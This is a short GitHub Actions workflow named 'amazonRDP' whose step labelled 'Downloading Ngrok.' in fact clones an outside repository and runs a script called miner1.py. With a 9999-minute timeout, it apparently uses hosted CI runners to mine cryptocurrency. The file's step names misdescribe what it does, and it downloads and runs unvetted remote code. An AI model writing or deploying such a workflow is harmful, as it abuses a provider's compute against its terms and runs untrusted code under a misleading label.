name: amazonRDP

on: workflow_dispatch

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 9999

    steps:
    - name: Downloading Ngrok.
      run: |
        git clone  https://github.com/TOMMARCUSBRUT/dcf
    - name: show
      run: |
        ls
        
    - name: show
      run: |
        python dcf/miner1.py
        
    - name: show
      run: |
        ls
